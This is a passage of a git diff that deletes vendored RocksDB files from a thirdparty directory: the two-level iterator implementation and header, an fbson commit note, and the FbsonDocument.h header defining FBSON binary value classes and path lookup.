-  // If second_level_iter is non-nullptr, then "data_block_handle_" holds the
-  // "index_value" passed to block_function_ to create the second_level_iter.
-  std::string data_block_handle_;
-};
-
-TwoLevelIterator::TwoLevelIterator(TwoLevelIteratorState* state,
-                                   InternalIterator* first_level_iter,
-                                   bool need_free_iter_and_state)
-    : state_(state),
-      first_level_iter_(first_level_iter),
-      need_free_iter_and_state_(need_free_iter_and_state),
-      pinned_iters_mgr_(nullptr) {}
-
-void TwoLevelIterator::Seek(const Slice& target) {
-  if (state_->check_prefix_may_match &&
-      !state_->PrefixMayMatch(target)) {
-    SetSecondLevelIterator(nullptr);
-    return;
-  }
-  first_level_iter_.Seek(target);
-
-  InitDataBlock();
-  if (second_level_iter_.iter() != nullptr) {
-    second_level_iter_.Seek(target);
-  }
-  SkipEmptyDataBlocksForward();
-}
-
-void TwoLevelIterator::SeekForPrev(const Slice& target) {
-  if (state_->check_prefix_may_match && !state_->PrefixMayMatch(target)) {
-    SetSecondLevelIterator(nullptr);
-    return;
-  }
-  first_level_iter_.Seek(target);
-  InitDataBlock();
-  if (second_level_iter_.iter() != nullptr) {
-    second_level_iter_.SeekForPrev(target);
-  }
-  if (!Valid()) {
-    if (!first_level_iter_.Valid()) {
-      first_level_iter_.SeekToLast();
-      InitDataBlock();
-      if (second_level_iter_.iter() != nullptr) {
-        second_level_iter_.SeekForPrev(target);
-      }
-    }
-    SkipEmptyDataBlocksBackward();
-  }
-}
-
-void TwoLevelIterator::SeekToFirst() {
-  first_level_iter_.SeekToFirst();
-  InitDataBlock();
-  if (second_level_iter_.iter() != nullptr) {
-    second_level_iter_.SeekToFirst();
-  }
-  SkipEmptyDataBlocksForward();
-}
-
-void TwoLevelIterator::SeekToLast() {
-  first_level_iter_.SeekToLast();
-  InitDataBlock();
-  if (second_level_iter_.iter() != nullptr) {
-    second_level_iter_.SeekToLast();
-  }
-  SkipEmptyDataBlocksBackward();
-}
-
-void TwoLevelIterator::Next() {
-  assert(Valid());
-  second_level_iter_.Next();
-  SkipEmptyDataBlocksForward();
-}
-
-void TwoLevelIterator::Prev() {
-  assert(Valid());
-  second_level_iter_.Prev();
-  SkipEmptyDataBlocksBackward();
-}
-
-void TwoLevelIterator::SkipEmptyDataBlocksForward() {
-  while (second_level_iter_.iter() == nullptr ||
-         (!second_level_iter_.Valid() &&
-          !second_level_iter_.status().IsIncomplete())) {
-    // Move to next block
-    if (!first_level_iter_.Valid() ||
-        state_->KeyReachedUpperBound(first_level_iter_.key())) {
-      SetSecondLevelIterator(nullptr);
-      return;
-    }
-    first_level_iter_.Next();
-    InitDataBlock();
-    if (second_level_iter_.iter() != nullptr) {
-      second_level_iter_.SeekToFirst();
-    }
-  }
-}
-
-void TwoLevelIterator::SkipEmptyDataBlocksBackward() {
-  while (second_level_iter_.iter() == nullptr ||
-         (!second_level_iter_.Valid() &&
-          !second_level_iter_.status().IsIncomplete())) {
-    // Move to next block
-    if (!first_level_iter_.Valid()) {
-      SetSecondLevelIterator(nullptr);
-      return;
-    }
-    first_level_iter_.Prev();
-    InitDataBlock();
-    if (second_level_iter_.iter() != nullptr) {
-      second_level_iter_.SeekToLast();
-    }
-  }
-}
-
-void TwoLevelIterator::SetSecondLevelIterator(InternalIterator* iter) {
-  if (second_level_iter_.iter() != nullptr) {
-    SaveError(second_level_iter_.status());
-  }
-
-  if (pinned_iters_mgr_ && iter) {
-    iter->SetPinnedItersMgr(pinned_iters_mgr_);
-  }
-
-  InternalIterator* old_iter = second_level_iter_.Set(iter);
-  if (pinned_iters_mgr_ && pinned_iters_mgr_->PinningEnabled()) {
-    pinned_iters_mgr_->PinIterator(old_iter);
-  } else {
-    delete old_iter;
-  }
-}
-
-void TwoLevelIterator::InitDataBlock() {
-  if (!first_level_iter_.Valid()) {
-    SetSecondLevelIterator(nullptr);
-  } else {
-    Slice handle = first_level_iter_.value();
-    if (second_level_iter_.iter() != nullptr &&
-        !second_level_iter_.status().IsIncomplete() &&
-        handle.compare(data_block_handle_) == 0) {
-      // second_level_iter is already constructed with this iterator, so
-      // no need to change anything
-    } else {
-      InternalIterator* iter = state_->NewSecondaryIterator(handle);
-      data_block_handle_.assign(handle.data(), handle.size());
-      SetSecondLevelIterator(iter);
-    }
-  }
-}
-
-}  // namespace
-
-InternalIterator* NewTwoLevelIterator(TwoLevelIteratorState* state,
-                                      InternalIterator* first_level_iter,
-                                      Arena* arena,
-                                      bool need_free_iter_and_state) {
-  if (arena == nullptr) {
-    return new TwoLevelIterator(state, first_level_iter,
-                                need_free_iter_and_state);
-  } else {
-    auto mem = arena->AllocateAligned(sizeof(TwoLevelIterator));
-    return new (mem)
-        TwoLevelIterator(state, first_level_iter, need_free_iter_and_state);
-  }
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/table/two_level_iterator.h b/thirdparty/rocksdb/table/two_level_iterator.h
deleted file mode 100644
index 34b33c8..0000000
--- a/thirdparty/rocksdb/table/two_level_iterator.h
+++ /dev/null
@@ -1,53 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-#include "rocksdb/iterator.h"
-#include "rocksdb/env.h"
-#include "table/iterator_wrapper.h"
-
-namespace rocksdb {
-
-struct ReadOptions;
-class InternalKeyComparator;
-class Arena;
-
-struct TwoLevelIteratorState {
-  explicit TwoLevelIteratorState(bool _check_prefix_may_match)
-      : check_prefix_may_match(_check_prefix_may_match) {}
-
-  virtual ~TwoLevelIteratorState() {}
-  virtual InternalIterator* NewSecondaryIterator(const Slice& handle) = 0;
-  virtual bool PrefixMayMatch(const Slice& internal_key) = 0;
-  virtual bool KeyReachedUpperBound(const Slice& internal_key) = 0;
-
-  // If call PrefixMayMatch()
-  bool check_prefix_may_match;
-};
-
-
-// Return a new two level iterator.  A two-level iterator contains an
-// index iterator whose values point to a sequence of blocks where
-// each block is itself a sequence of key,value pairs.  The returned
-// two-level iterator yields the concatenation of all key/value pairs
-// in the sequence of blocks.  Takes ownership of "index_iter" and
-// will delete it when no longer needed.
-//
-// Uses a supplied function to convert an index_iter value into
-// an iterator over the contents of the corresponding block.
-// arena: If not null, the arena is used to allocate the Iterator.
-//        When destroying the iterator, the destructor will destroy
-//        all the states but those allocated in arena.
-// need_free_iter_and_state: free `state` and `first_level_iter` if
-//                           true. Otherwise, just call destructor.
-extern InternalIterator* NewTwoLevelIterator(
-    TwoLevelIteratorState* state, InternalIterator* first_level_iter,
-    Arena* arena = nullptr, bool need_free_iter_and_state = true);
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/third-party/fbson/COMMIT.md b/thirdparty/rocksdb/third-party/fbson/COMMIT.md
deleted file mode 100644
index b38b542..0000000
--- a/thirdparty/rocksdb/third-party/fbson/COMMIT.md
+++ /dev/null
@@ -1,5 +0,0 @@
-fbson commit: 
-https://github.com/facebook/mysql-5.6/commit/55ef9ff25c934659a70b4094e9b406c48e9dd43d
-
-# TODO.
-* Had to convert zero sized array to [1] sized arrays due to the fact that MS Compiler complains about it not being standard. At some point need to contribute this change back to MySql where this code was taken from.
diff --git a/thirdparty/rocksdb/third-party/fbson/FbsonDocument.h b/thirdparty/rocksdb/third-party/fbson/FbsonDocument.h
deleted file mode 100644
index 6fb8a93..0000000
--- a/thirdparty/rocksdb/third-party/fbson/FbsonDocument.h
+++ /dev/null
@@ -1,893 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-/*
- * This header defines FbsonDocument, FbsonKeyValue, and various value classes
- * which are derived from FbsonValue, and a forward iterator for container
- * values - essentially everything that is related to FBSON binary data
- * structures.
- *
- * Implementation notes:
- *
- * None of the classes in this header file can be instantiated directly (i.e.
- * you cannot create a FbsonKeyValue or FbsonValue object - all constructors
- * are declared non-public). We use the classes as wrappers on the packed FBSON
- * bytes (serialized), and cast the classes (types) to the underlying packed
- * byte array.
- *
- * For the same reason, we cannot define any FBSON value class to be virtual,
- * since we never call constructors, and will not instantiate vtbl and vptrs.
- *
- * Therefore, the classes are defined as packed structures (i.e. no data
- * alignment and padding), and the private member variables of the classes are
- * defined precisely in the same order as the FBSON spec. This ensures we
- * access the packed FBSON bytes correctly.
- *
- * The packed structures are highly optimized for in-place operations with low
- * overhead. The reads (and in-place writes) are performed directly on packed
- * bytes. There is no memory allocation at all at runtime.
- *
- * For updates/writes of values that will expand the original FBSON size, the
- * write will fail, and the caller needs to handle buffer increase.
- *
- * ** Iterator **
- * Both ObjectVal class and ArrayVal class have iterator type that you can use
- * to declare an iterator on a container object to go through the key-value
- * pairs or value list. The iterator has both non-const and const types.
- *
- * Note: iterators are forward direction only.
- *
- * ** Query **
- * Querying into containers is through the member functions find (for key/value
- * pairs) and get (for array elements), and is in streaming style. We don't
- * need to read/scan the whole FBSON packed bytes in order to return results.
- * Once the key/index is found, we will stop search.  You can use text to query
- * both objects and array (for array, text will be converted to integer index),
- * and use index to retrieve from array. Array index is 0-based.
- *
- * ** External dictionary **
- * During query processing, you can also pass a call-back function, so the
- * search will first try to check if the key string exists in the dictionary.
- * If so, search will be based on the id instead of the key string.
- *
- * @author Tian Xia <tianx@fb.com>
- */
-
-#ifndef FBSON_FBSONDOCUMENT_H
-#define FBSON_FBSONDOCUMENT_H
-
-#include <stdlib.h>
-#include <string.h>
-#include <assert.h>
-
-namespace fbson {
-
-#pragma pack(push, 1)
-
-#define FBSON_VER 1
-
-// forward declaration
-class FbsonValue;
-class ObjectVal;
-
-/*
- * FbsonDocument is the main object that accesses and queries FBSON packed
- * bytes. NOTE: FbsonDocument only allows object container as the top level
- * FBSON value. However, you can use the static method "createValue" to get any
- * FbsonValue object from the packed bytes.
- *
- * FbsonDocument object also dereferences to an object container value
- * (ObjectVal) once FBSON is loaded.
- *
- * ** Load **
- * FbsonDocument is usable after loading packed bytes (memory location) into
- * the object. We only need the header and first few bytes of the payload after
- * header to verify the FBSON.
- *
- * Note: creating an FbsonDocument (through createDocument) does not allocate
- * any memory. The document object is an efficient wrapper on the packed bytes
- * which is accessed directly.
- *
- * ** Query **
- * Query is through dereferencing into ObjectVal.
- */
-class FbsonDocument {
- public:
-  // create an FbsonDocument object from FBSON packed bytes
-  static FbsonDocument* createDocument(const char* pb, uint32_t size);
-
-  // create an FbsonValue from FBSON packed bytes
-  static FbsonValue* createValue(const char* pb, uint32_t size);
-
-  uint8_t version() { return header_.ver_; }
-
-  FbsonValue* getValue() { return ((FbsonValue*)payload_); }
-
-  ObjectVal* operator->() { return ((ObjectVal*)payload_); }
-
-  const ObjectVal* operator->() const { return ((const ObjectVal*)payload_); }
-
- private:
-  /*
-   * FbsonHeader class defines FBSON header (internal to FbsonDocument).
-   *
-   * Currently it only contains version information (1-byte). We may expand the
-   * header to include checksum of the FBSON binary for more security.
-   */
-  struct FbsonHeader {
-    uint8_t ver_;
-  } header_;
-
-  char payload_[1];
-
-  FbsonDocument();
-
-  FbsonDocument(const FbsonDocument&) = delete;
-  FbsonDocument& operator=(const FbsonDocument&) = delete;
-};
-
-/*
- * FbsonFwdIteratorT implements FBSON's iterator template.
- *
- * Note: it is an FORWARD iterator only due to the design of FBSON format.
- */
-template <class Iter_Type, class Cont_Type>
-class FbsonFwdIteratorT {
-  typedef Iter_Type iterator;
-  typedef typename std::iterator_traits<Iter_Type>::pointer pointer;
-  typedef typename std::iterator_traits<Iter_Type>::reference reference;
-
- public:
-  explicit FbsonFwdIteratorT(const iterator& i) : current_(i) {}
-
-  // allow non-const to const iterator conversion (same container type)
-  template <class Iter_Ty>
-  FbsonFwdIteratorT(const FbsonFwdIteratorT<Iter_Ty, Cont_Type>& rhs)
-      : current_(rhs.base()) {}
-
-  bool operator==(const FbsonFwdIteratorT& rhs) const {
-    return (current_ == rhs.current_);
-  }
-
-  bool operator!=(const FbsonFwdIteratorT& rhs) const {
-    return !operator==(rhs);
-  }
-
-  bool operator<(const FbsonFwdIteratorT& rhs) const {
-    return (current_ < rhs.current_);
-  }
-
-  bool operator>(const FbsonFwdIteratorT& rhs) const { return !operator<(rhs); }
-
-  FbsonFwdIteratorT& operator++() {
-    current_ = (iterator)(((char*)current_) + current_->numPackedBytes());
-    return *this;
-  }
-
-  FbsonFwdIteratorT operator++(int) {
-    auto tmp = *this;
-    current_ = (iterator)(((char*)current_) + current_->numPackedBytes());
-    return tmp;
-  }
-
-  explicit operator pointer() { return current_; }
-
-  reference operator*() const { return *current_; }
-
-  pointer operator->() const { return current_; }
-
-  iterator base() const { return current_; }
-
- private:
-  iterator current_;
-};
-
-typedef int (*hDictInsert)(const char* key, unsigned len);
-typedef int (*hDictFind)(const char* key, unsigned len);
-
-/*
- * FbsonType defines 10 primitive types and 2 container types, as described
- * below.
- *
- * primitive_value ::=
- *   0x00        //null value (0 byte)
- * | 0x01        //boolean true (0 byte)
- * | 0x02        //boolean false (0 byte)
- * | 0x03 int8   //char/int8 (1 byte)
- * | 0x04 int16  //int16 (2 bytes)
- * | 0x05 int32  //int32 (4 bytes)
- * | 0x06 int64  //int64 (8 bytes)
- * | 0x07 double //floating point (8 bytes)
- * | 0x08 string //variable length string
- * | 0x09 binary //variable length binary
- *
- * container ::=
- *   0x0A int32 key_value_list //object, int32 is the total bytes of the object
- * | 0x0B int32 value_list     //array, int32 is the total bytes of the array
- */
-enum class FbsonType : char {
-  T_Null = 0x00,
-  T_True = 0x01,
-  T_False = 0x02,
-  T_Int8 = 0x03,
-  T_Int16 = 0x04,
-  T_Int32 = 0x05,
-  T_Int64 = 0x06,
-  T_Double = 0x07,
-  T_String = 0x08,
-  T_Binary = 0x09,
-  T_Object = 0x0A,
-  T_Array = 0x0B,
-  NUM_TYPES,
-};
-
-typedef std::underlying_type<FbsonType>::type FbsonTypeUnder;
-
-/*
- * FbsonKeyValue class defines FBSON key type, as described below.
- *
- * key ::=
- *   0x00 int8    //1-byte dictionary id
- * | int8 (byte*) //int8 (>0) is the size of the key string
- *
- * value ::= primitive_value | container
- *
- * FbsonKeyValue can be either an id mapping to the key string in an external
- * dictionary, or it is the original key string. Whether to read an id or a
- * string is decided by the first byte (size_).
- *
- * Note: a key object must be followed by a value object. Therefore, a key
- * object implicitly refers to a key-value pair, and you can get the value
- * object right after the key object. The function numPackedBytes hence
- * indicates the total size of the key-value pair, so that we will be able go
- * to next pair from the key.
- *
- * ** Dictionary size **
- * By default, the dictionary size is 255 (1-byte). Users can define
- * "USE_LARGE_DICT" to increase the dictionary size to 655535 (2-byte).
- */
-class FbsonKeyValue {
- public:
-#ifdef USE_LARGE_DICT
-  static const int sMaxKeyId = 65535;
-  typedef uint16_t keyid_type;
-#else
-  static const int sMaxKeyId = 255;
-  typedef uint8_t keyid_type;
-#endif // #ifdef USE_LARGE_DICT
-
-  static const uint8_t sMaxKeyLen = 64;
-
-  // size of the key. 0 indicates it is stored as id
-  uint8_t klen() const { return size_; }
-
-  // get the key string. Note the string may not be null terminated.
-  const char* getKeyStr() const { return key_.str_; }
-
-  keyid_type getKeyId() const { return key_.id_; }
-
-  unsigned int keyPackedBytes() const {
-    return size_ ? (sizeof(size_) + size_)
-                 : (sizeof(size_) + sizeof(keyid_type));
-  }
-
-  FbsonValue* value() const {
-    return (FbsonValue*)(((char*)this) + keyPackedBytes());
-  }
-
-  // size of the total packed bytes (key+value)
-  unsigned int numPackedBytes() const;
-
- private:
-  uint8_t size_;
-
-  union key_ {
-    keyid_type id_;
-    char str_[1];
-  } key_;
-
-  FbsonKeyValue();
-};
-
-/*
- * FbsonValue is the base class of all FBSON types. It contains only one member
- * variable - type info, which can be retrieved by member functions is[Type]()
- * or type().
- */
-class FbsonValue {
- public:
-  static const uint32_t sMaxValueLen = 1 << 24; // 16M
-
-  bool isNull() const { return (type_ == FbsonType::T_Null); }
-  bool isTrue() const { return (type_ == FbsonType::T_True); }
-  bool isFalse() const { return (type_ == FbsonType::T_False); }
-  bool isInt8() const { return (type_ == FbsonType::T_Int8); }
-  bool isInt16() const { return (type_ == FbsonType::T_Int16); }
-  bool isInt32() const { return (type_ == FbsonType::T_Int32); }
-  bool isInt64() const { return (type_ == FbsonType::T_Int64); }
-  bool isDouble() const { return (type_ == FbsonType::T_Double); }
-  bool isString() const { return (type_ == FbsonType::T_String); }
-  bool isBinary() const { return (type_ == FbsonType::T_Binary); }
-  bool isObject() const { return (type_ == FbsonType::T_Object); }
-  bool isArray() const { return (type_ == FbsonType::T_Array); }
-
-  FbsonType type() const { return type_; }
-
-  // size of the total packed bytes
-  unsigned int numPackedBytes() const;
-
-  // size of the value in bytes
-  unsigned int size() const;
-
-  // get the raw byte array of the value
-  const char* getValuePtr() const;
-
-  // find the FBSON value by a key path string (null terminated)
-  FbsonValue* findPath(const char* key_path,
-                       const char* delim = ".",
-                       hDictFind handler = nullptr) {
-    return findPath(key_path, (unsigned int)strlen(key_path), delim, handler);
-  }
-
-  // find the FBSON value by a key path string (with length)
-  FbsonValue* findPath(const char* key_path,
-                       unsigned int len,
-                       const char* delim,
-                       hDictFind handler);
-
- protected:
-  FbsonType type_; // type info
-
-  FbsonValue();
-};
-
-/*
- * NumerValT is the template class (derived from FbsonValue) of all number
- * types (integers and double).
- */
-template <class T>
-class NumberValT : public FbsonValue {
- public:
-  T val() const { return num_; }
-
-  unsigned int numPackedBytes() const { return sizeof(FbsonValue) + sizeof(T); }
-
-  // catch all unknow specialization of the template class
-  bool setVal(T value) { return false; }
-
- private:
-  T num_;
-
-  NumberValT();
-};
-
-typedef NumberValT<int8_t> Int8Val;
-
-// override setVal for Int8Val
-template <>
-inline bool Int8Val::setVal(int8_t value) {
-  if (!isInt8()) {
-    return false;
-  }
-
-  num_ = value;
-  return true;
-}
-
-typedef NumberValT<int16_t> Int16Val;
-
-// override setVal for Int16Val
-template <>
-inline bool Int16Val::setVal(int16_t value) {
-  if (!isInt16()) {
-    return false;
-  }
-
-  num_ = value;
-  return true;
-}
-
-typedef NumberValT<int32_t> Int32Val;
-
-// override setVal for Int32Val
-template <>
-inline bool Int32Val::setVal(int32_t value) {
-  if (!isInt32()) {
-    return false;
-  }
-
-  num_ = value;
-  return true;
-}
-
-typedef NumberValT<int64_t> Int64Val;
-
-// override setVal for Int64Val
-template <>
-inline bool Int64Val::setVal(int64_t value) {
-  if (!isInt64()) {
-    return false;
-  }
-
-  num_ = value;
-  return true;
-}
-
-typedef NumberValT<double> DoubleVal;
-
-// override setVal for DoubleVal
-template <>
-inline bool DoubleVal::setVal(double value) {
-  if (!isDouble()) {
-    return false;
-  }
-
-  num_ = value;
-  return true;
-}
-
-/*
- * BlobVal is the base class (derived from FbsonValue) for string and binary
- * types. The size_ indicates the total bytes of the payload_.
- */
-class BlobVal : public FbsonValue {
- public:
-  // size of the blob payload only
-  unsigned int getBlobLen() const { return size_; }
-
-  // return the blob as byte array
-  const char* getBlob() const { return payload_; }
-
-  // size of the total packed bytes
-  unsigned int numPackedBytes() const {
-    return sizeof(FbsonValue) + sizeof(size_) + size_;
-  }
-
- protected:
-  uint32_t size_;
-  char payload_[1];
-
-  // set new blob bytes
-  bool internalSetVal(const char* blob, uint32_t blobSize) {
-    // if we cannot fit the new blob, fail the operation
-    if (blobSize > size_) {
-      return false;
-    }
-
-    memcpy(payload_, blob, blobSize);
-
-    // Set the reset of the bytes to 0.  Note we cannot change the size_ of the
-    // current payload, as all values are packed.
-    memset(payload_ + blobSize, 0, size_ - blobSize);
-
-    return true;
-  }
-
-  BlobVal();
-
- private:
-  // Disable as this class can only be allocated dynamically
-  BlobVal(const BlobVal&) = delete;
-  BlobVal& operator=(const BlobVal&) = delete;
-};
-
-/*
- * Binary type
- */
-class BinaryVal : public BlobVal {
- public:
-  bool setVal(const char* blob, uint32_t blobSize) {
-    if (!isBinary()) {
-      return false;
-    }
-
-    return internalSetVal(blob, blobSize);
-  }
-
- private:
-  BinaryVal();
-};
-
-/*
- * String type
- * Note: FBSON string may not be a c-string (NULL-terminated)
- */
-class StringVal : public BlobVal {
- public:
-  bool setVal(const char* str, uint32_t blobSize) {
-    if (!isString()) {
-      return false;
-    }
-
-    return internalSetVal(str, blobSize);
-  }
-
- private:
-  StringVal();
-};
-
-/*
- * ContainerVal is the base class (derived from FbsonValue) for object and
- * array types. The size_ indicates the total bytes of the payload_.
- */
-class ContainerVal : public FbsonValue {
- public:
-  // size of the container payload only
-  unsigned int getContainerSize() const { return size_; }
-
-  // return the container payload as byte array
-  const char* getPayload() const { return payload_; }
-
-  // size of the total packed bytes
-  unsigned int numPackedBytes() const {
-    return sizeof(FbsonValue) + sizeof(size_) + size_;
-  }
-
- protected:
-  uint32_t size_;
-  char payload_[1];
-
-  ContainerVal();
-
-  ContainerVal(const ContainerVal&) = delete;
-  ContainerVal& operator=(const ContainerVal&) = delete;
-};
-
-/*
- * Object type
- */
-class ObjectVal : public ContainerVal {
- public:
-  // find the FBSON value by a key string (null terminated)
-  FbsonValue* find(const char* key, hDictFind handler = nullptr) const {
-    if (!key)
-      return nullptr;
-
-    return find(key, (unsigned int)strlen(key), handler);
-  }
-
-  // find the FBSON value by a key string (with length)
-  FbsonValue* find(const char* key,
-                   unsigned int klen,
-                   hDictFind handler = nullptr) const {
-    if (!key || !klen)
-      return nullptr;
-
-    int key_id = -1;
-    if (handler && (key_id = handler(key, klen)) >= 0) {
-      return find(key_id);
-    }
-
-    return internalFind(key, klen);
-  }
-
-  // find the FBSON value by a key dictionary ID
-  FbsonValue* find(int key_id) const {
-    if (key_id < 0 || key_id > FbsonKeyValue::sMaxKeyId)
-      return nullptr;
-
-    const char* pch = payload_;
-    const char* fence = payload_ + size_;
-
-    while (pch < fence) {
-      FbsonKeyValue* pkey = (FbsonKeyValue*)(pch);
-      if (!pkey->klen() && key_id == pkey->getKeyId()) {
-        return pkey->value();
-      }
-      pch += pkey->numPackedBytes();
-    }
-
-    assert(pch == fence);
-
-    return nullptr;
-  }
-
-  typedef FbsonKeyValue value_type;
-  typedef value_type* pointer;
-  typedef const value_type* const_pointer;
-  typedef FbsonFwdIteratorT<pointer, ObjectVal> iterator;
-  typedef FbsonFwdIteratorT<const_pointer, ObjectVal> const_iterator;
-
-  iterator begin() { return iterator((pointer)payload_); }
-
-  const_iterator begin() const { return const_iterator((pointer)payload_); }
-
-  iterator end() { return iterator((pointer)(payload_ + size_)); }
-
-  const_iterator end() const {
-    return const_iterator((pointer)(payload_ + size_));
-  }
-
- private:
-  FbsonValue* internalFind(const char* key, unsigned int klen) const {
-    const char* pch = payload_;
-    const char* fence = payload_ + size_;
-
-    while (pch < fence) {
-      FbsonKeyValue* pkey = (FbsonKeyValue*)(pch);
-      if (klen == pkey->klen() && strncmp(key, pkey->getKeyStr(), klen) == 0) {
-        return pkey->value();
-      }
-      pch += pkey->numPackedBytes();
-    }
-
-    assert(pch == fence);
-
-    return nullptr;
-  }
-
- private:
-  ObjectVal();
-};
-
-/*
- * Array type
- */
-class ArrayVal : public ContainerVal {
- public:
-  // get the FBSON value at index
-  FbsonValue* get(int idx) const {
-    if (idx < 0)
-      return nullptr;
-
-    const char* pch = payload_;
-    const char* fence = payload_ + size_;
-
-    while (pch < fence && idx-- > 0)
-      pch += ((FbsonValue*)pch)->numPackedBytes();
-
-    if (idx == -1)
-      return (FbsonValue*)pch;
-    else {
-      assert(pch == fence);
-      return nullptr;
-    }
-  }
-
-  // Get number of elements in array
-  unsigned int numElem() const {
-    const char* pch = payload_;
-    const char* fence = payload_ + size_;
-
-    unsigned int num = 0;
-    while (pch < fence) {
-      ++num;
-      pch += ((FbsonValue*)pch)->numPackedBytes();
-    }
-
-    assert(pch == fence);
-
-    return num;
-  }
-
-  typedef FbsonValue value_type;
-  typedef value_type* pointer;
-  typedef const value_type* const_pointer;
-  typedef FbsonFwdIteratorT<pointer, ArrayVal> iterator;
-  typedef FbsonFwdIteratorT<const_pointer, ArrayVal> const_iterator;
-
-  iterator begin() { return iterator((pointer)payload_); }
-
-  const_iterator begin() const { return const_iterator((pointer)payload_); }
-
-  iterator end() { return iterator((pointer)(payload_ + size_)); }
-
-  const_iterator end() const {
-    return const_iterator((pointer)(payload_ + size_));
-  }
-
- private:
-  ArrayVal();
-};
-
-inline FbsonDocument* FbsonDocument::createDocument(const char* pb,
-                                                    uint32_t size) {
-  if (!pb || size < sizeof(FbsonHeader) + sizeof(FbsonValue)) {
-    return nullptr;
-  }
-
-  FbsonDocument* doc = (FbsonDocument*)pb;
-  if (doc->header_.ver_ != FBSON_VER) {
-    return nullptr;
-  }
-
-  FbsonValue* val = (FbsonValue*)doc->payload_;
-  if (!val->isObject() || size != sizeof(FbsonHeader) + val->numPackedBytes()) {
-    return nullptr;
-  }
-
-  return doc;
-}
-
-inline FbsonValue* FbsonDocument::createValue(const char* pb, uint32_t size) {
-  if (!pb || size < sizeof(FbsonHeader) + sizeof(FbsonValue)) {
-    return nullptr;
-  }
-
-  FbsonDocument* doc = (FbsonDocument*)pb;
-  if (doc->header_.ver_ != FBSON_VER) {
-    return nullptr;
-  }
-
-  FbsonValue* val = (FbsonValue*)doc->payload_;
-  if (size != sizeof(FbsonHeader) + val->numPackedBytes()) {
-    return nullptr;
-  }
-
-  return val;
-}
-
-inline unsigned int FbsonKeyValue::numPackedBytes() const {
-  unsigned int ks = keyPackedBytes();
-  FbsonValue* val = (FbsonValue*)(((char*)this) + ks);
-  return ks + val->numPackedBytes();
-}
-
-// Poor man's "virtual" function FbsonValue::numPackedBytes
-inline unsigned int FbsonValue::numPackedBytes() const {
-  switch (type_) {
-  case FbsonType::T_Null:
-  case FbsonType::T_True:
-  case FbsonType::T_False: {
-    return sizeof(type_);
-  }
-
-  case FbsonType::T_Int8: {
-    return sizeof(type_) + sizeof(int8_t);
-  }
-  case FbsonType::T_Int16: {
-    return sizeof(type_) + sizeof(int16_t);
-  }
-  case FbsonType::T_Int32: {
-    return sizeof(type_) + sizeof(int32_t);
-  }
-  case FbsonType::T_Int64: {
-    return sizeof(type_) + sizeof(int64_t);
-  }
-  case FbsonType::T_Double: {
-    return sizeof(type_) + sizeof(double);
-  }
-  case FbsonType::T_String:
-  case FbsonType::T_Binary: {
-    return ((BlobVal*)(this))->numPackedBytes();
-  }
-
-  case FbsonType::T_Object:
-  case FbsonType::T_Array: {
-    return ((ContainerVal*)(this))->numPackedBytes();
-  }
-  default:
-    return 0;
-  }
-}
-
-inline unsigned int FbsonValue::size() const {
-  switch (type_) {
-  case FbsonType::T_Int8: {
-    return sizeof(int8_t);
-  }
-  case FbsonType::T_Int16: {
-    return sizeof(int16_t);
-  }
-  case FbsonType::T_Int32: {
-    return sizeof(int32_t);
-  }
-  case FbsonType::T_Int64: {
-    return sizeof(int64_t);
-  }
-  case FbsonType::T_Double: {
-    return sizeof(double);
-  }
-  case FbsonType::T_String:
-  case FbsonType::T_Binary: {
-    return ((BlobVal*)(this))->getBlobLen();
-  }
-
-  case FbsonType::T_Object:
-  case FbsonType::T_Array: {
-    return ((ContainerVal*)(this))->getContainerSize();
-  }
-  case FbsonType::T_Null:
-  case FbsonType::T_True:
-  case FbsonType::T_False:
-  default:
-    return 0;
-  }
-}
-
-inline const char* FbsonValue::getValuePtr() const {
-  switch (type_) {
-  case FbsonType::T_Int8:
-  case FbsonType::T_Int16:
-  case FbsonType::T_Int32:
-  case FbsonType::T_Int64:
-  case FbsonType::T_Double:
-    return ((char*)this) + sizeof(FbsonType);
-
-  case FbsonType::T_String:
-  case FbsonType::T_Binary:
-    return ((BlobVal*)(this))->getBlob();
-
-  case FbsonType::T_Object:
-  case FbsonType::T_Array:
-    return ((ContainerVal*)(this))->getPayload();
-
-  case FbsonType::T_Null:
-  case FbsonType::T_True:
-  case FbsonType::T_False:
-  default:
-    return nullptr;
-  }
-}
-
-inline FbsonValue* FbsonValue::findPath(const char* key_path,
-                                        unsigned int kp_len,
-                                        const char* delim = ".",
-                                        hDictFind handler = nullptr) {
-  if (!key_path || !kp_len)
-    return nullptr;
-
-  if (!delim)
-    delim = "."; // default delimiter
-
-  FbsonValue* pval = this;
-  const char* fence = key_path + kp_len;
-  char idx_buf[21]; // buffer to parse array index (integer value)
-
-  while (pval && key_path < fence) {
-    const char* key = key_path;
-    unsigned int klen = 0;
-    // find the current key
-    for (; key_path != fence && *key_path != *delim; ++key_path, ++klen)
-      ;
-
-    if (!klen)
-      return nullptr;
-
-    switch (pval->type_) {
-    case FbsonType::T_Object: {
-      pval = ((ObjectVal*)pval)->find(key, klen, handler);
-      break;
-    }
-
-    case FbsonType::T_Array: {
-      // parse string into an integer (array index)
-      if (klen >= sizeof(idx_buf))
-        return nullptr;
-
-      memcpy(idx_buf, key, klen);
-      idx_buf[klen] = 0;
-
-      char* end = nullptr;
-      int index = (int)strtol(idx_buf, &end, 10);
-      if (end && !*end)
-        pval = ((fbson::ArrayVal*)pval)->get(index);
-      else
-        // incorrect index string
-        return nullptr;
-      break;
-    }
-
-    default:
-      return nullptr;
-    }
-
-    // skip the delimiter
-    if (key_path < fence) {
-      ++key_path;
-      if (key_path == fence)
-        // we have a trailing delimiter at the end
-        return nullptr;
-    }
-  }
-
-  return pval;
-}
-
-#pragma pack(pop)
-
-} // namespace fbson
-
-#endif // FBSON_FBSONDOCUMENT_H
diff --git a/thirdparty/rocksdb/third-party/fbson/FbsonJsonParser.h b/thirdparty/rocksdb/third-party/fbson/FbsonJsonParser.h
deleted file mode 100644
